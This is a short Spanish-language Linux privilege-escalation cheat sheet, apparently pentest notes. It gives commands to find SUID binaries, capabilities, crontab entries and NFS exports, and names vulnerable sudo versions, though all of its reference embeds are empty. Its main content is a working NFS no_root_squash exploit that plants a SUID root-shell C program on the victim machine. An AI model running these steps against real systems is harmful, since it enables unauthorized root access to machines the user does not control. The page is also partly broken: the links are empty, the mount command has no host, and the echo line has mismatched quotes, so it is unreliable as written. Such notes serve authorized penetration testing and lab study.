# Linux Privesc
#### LD\_Preload Privesc
{% embed url="" %}
{% embed url="" %}
#### Sudo binary privesc
Sudo <1.8.28
{% embed url="" %}
{% embed url="" %}
Sudo <1.8.30 y pwfeedback habilitado
{% embed url="" %}
#### SUID
```bash
find / -perm -u=s -type f 2>/dev/null
```
#### Capabilities
```bash
getcap -r / 2>/dev/null
```
#### NFS Root Squashing
```bash
cat /etc/exports
#Si una carpeta tiene la flag “no_root_squash” se puede montar con NFS y los archivos serán creados como root (id 0)
#Desde la máquina atacante
showmount -e
mkdir /tmp/mountme
mount -o rw,vers=2 :/tmp /tmp/mountme
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }’ > /tmp/mountme/x.c
gcc /tmp/mountme/x.c -o /tmp/mountme/x
chmod +s /tmp/mountme/x
#Desde la máquina víctima
./x
```
#### Tareas programadas
```bash
cat /etc/crontab
```
{% embed url="" %}
#### Docker
{% embed url="" %}
{% embed url="" %}
#### Enlaces adicionales
{% embed url="" %}
{% embed url="" %}